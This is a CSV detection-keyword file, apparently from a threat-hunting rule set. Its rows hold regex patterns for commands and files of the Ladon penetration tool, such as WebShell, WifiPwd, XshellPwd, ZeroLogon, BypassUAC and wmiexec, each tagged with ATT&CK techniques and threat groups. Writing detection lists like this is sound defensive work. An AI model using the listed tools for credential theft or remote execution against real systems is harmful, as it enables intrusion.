UdpServer*",".{0,1000}Ladon\sUdpServer.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50761" "*Ladon WebShell*",".{0,1000}Ladon\sWebShell.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50762" "*Ladon whoami*",".{0,1000}Ladon\swhoami.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50763" "*Ladon WifiPwd*",".{0,1000}Ladon\sWifiPwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50764" "*Ladon wmiexec*",".{0,1000}Ladon\swmiexec.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50765" "*Ladon WmiExec2 *",".{0,1000}Ladon\sWmiExec2\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50766" "*Ladon XshellPwd*",".{0,1000}Ladon\sXshellPwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50767" "*Ladon ZeroLogon*",".{0,1000}Ladon\sZeroLogon.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50768" "*Ladon40 BypassUAC*",".{0,1000}Ladon40\sBypassUAC.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50769" "*Ladon911*.ps1",".{0,1000}Ladon911.{0,1000}\.ps1","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50770" "*Ladon911.exe*",".{0,1000}Ladon911\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50771" "*Ladon911_*.rar*",".{0,1000}Ladon911_.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50772" "*LadonExp.exe*",".{0,1000}LadonExp\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50773" "*LadonGUI.exe*",".{0,1000}LadonGUI\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50774" "*LadonLib.rar*",".{0,1000}LadonLib\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 